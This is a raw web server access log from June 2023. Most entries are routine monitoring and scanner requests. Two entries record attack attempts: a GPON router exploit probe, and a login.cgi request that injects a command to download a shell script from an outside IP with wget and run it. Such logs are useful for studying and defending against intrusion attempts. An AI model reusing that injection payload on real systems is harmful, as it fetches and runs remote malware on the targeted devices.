212.91.246.72 - - [02/Jun/2023:07:28:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
71.208.77.191 - - [02/Jun/2023:07:28:17 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [02/Jun/2023:07:29:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:30:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:31:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:32:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:33:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:34:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.10 - - [02/Jun/2023:07:34:54 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [02/Jun/2023:07:35:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:36:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.38 - - [02/Jun/2023:07:36:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [02/Jun/2023:07:37:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:38:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.5 - - [02/Jun/2023:07:38:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
212.91.246.72 - - [02/Jun/2023:07:39:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:40:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.5 - - [02/Jun/2023:07:40:53 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0"
212.91.246.72 - - [02/Jun/2023:07:41:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.5 - - [02/Jun/2023:07:41:57 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
